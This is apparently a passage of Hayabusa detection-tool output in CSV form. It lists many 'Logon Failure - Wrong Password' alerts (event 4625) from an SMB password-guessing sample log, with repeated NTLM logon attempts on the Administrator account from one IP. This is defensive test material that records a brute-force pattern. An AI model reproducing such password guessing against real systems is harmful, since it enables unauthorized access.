NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: 